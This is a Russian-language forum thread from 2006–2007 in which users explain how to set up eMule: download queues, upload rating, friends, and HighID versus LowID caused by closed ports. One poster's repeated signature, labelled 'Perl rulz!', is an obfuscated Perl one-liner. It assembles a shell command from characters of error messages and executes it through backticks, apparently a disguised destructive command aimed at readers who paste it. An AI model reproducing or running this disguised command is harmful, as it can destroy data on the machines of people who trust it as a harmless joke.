Добавлено: Вс Ноя 26, 2006 3:27 am Заголовок сообщения:
хрень какаято, хотя я не видел чтобы у меня удалял, но и до 4 месяцев не довожу обычно _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Вс Сен 16, 2007 9:13 pm Заголовок сообщения:
я качаю, у меня - нет _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Сен 16, 2007 10:22 pm Заголовок сообщения:
я когда сидел на принце у меня не качали, никто не видел меня наверно _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Научите пожалуйста ослом пользоваться. _________________ Скажи, что я ее люблю... Без нее вся жизнь равна нулю, из-за нее вся жизнь равна нулю... (с) А.Васильев
У тоб? так багато стор?н, я просто не розум?ю... Я просто хочу спитати тебе, чому ти наст?льки красива!?... (с) Олег Собчук
Цитаты дня:
xxx
Я много зарабатываю
xxx
Я работаю ртом
xxx
Я певица
yyy
а с личной жизнью все в порядке?
zzz
угу, еще как! Полный порядок. Мы никогда не ссоримся, не надоедаем друг другу и вообще во всем абсолютное согласие и единение
когда я дисе настраивал осла мне приходилось раз 5 к нему ездить, потомучто хуй поймешь иногда в чем проблема _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
ALuserX
для начала скажи вообще что треюуется установить и как происходит скачивание вообще _________________ Скажи, что я ее люблю... Без нее вся жизнь равна нулю, из-за нее вся жизнь равна нулю... (с) А.Васильев
У тоб? так багато стор?н, я просто не розум?ю... Я просто хочу спитати тебе, чому ти наст?льки красива!?... (с) Олег Собчук
Цитаты дня:
xxx
Я много зарабатываю
xxx
Я работаю ртом
xxx
Я певица
yyy
а с личной жизнью все в порядке?
zzz
угу, еще как! Полный порядок. Мы никогда не ссоримся, не надоедаем друг другу и вообще во всем абсолютное согласие и единение
у меня лежит файл, ты хочешь его скачать, становишься ко мне в очередь, как и другие сотни юзеров, твое место в очереди зависит от твоего рейтинга
у тебя есть на компе в расшарке тоже какието файлы, чем больше у тебя их качают, тем выше у тебя рейтинг
еще, есть такая фишка как "друзья", тоесть если ты у меня в друзьях то твой рейтинг для меня удваивается
дальше
если ты и я оба качаем у когото файл, и у нас он обоих частично, то когда я у тебя качаю часть которой нет у меня, то твой рейтинг в моей очереди растет
ID
бывает HighID и LowID
если у тебя LID, то это очень плохо, потомучто ты не сможешь обмениваться источниками с другими пользователями, и тебя не будет видно на сервере
LID получается если у тебя закрыты порты, они могут быть закрыты в файрволе, в рутере, или провайдером (последнее критично)
вобщемто я и ездил к дисе 5 раз потомучто не мог HID настроить нормально, а без него смысла пользоваться ослом практически нет _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!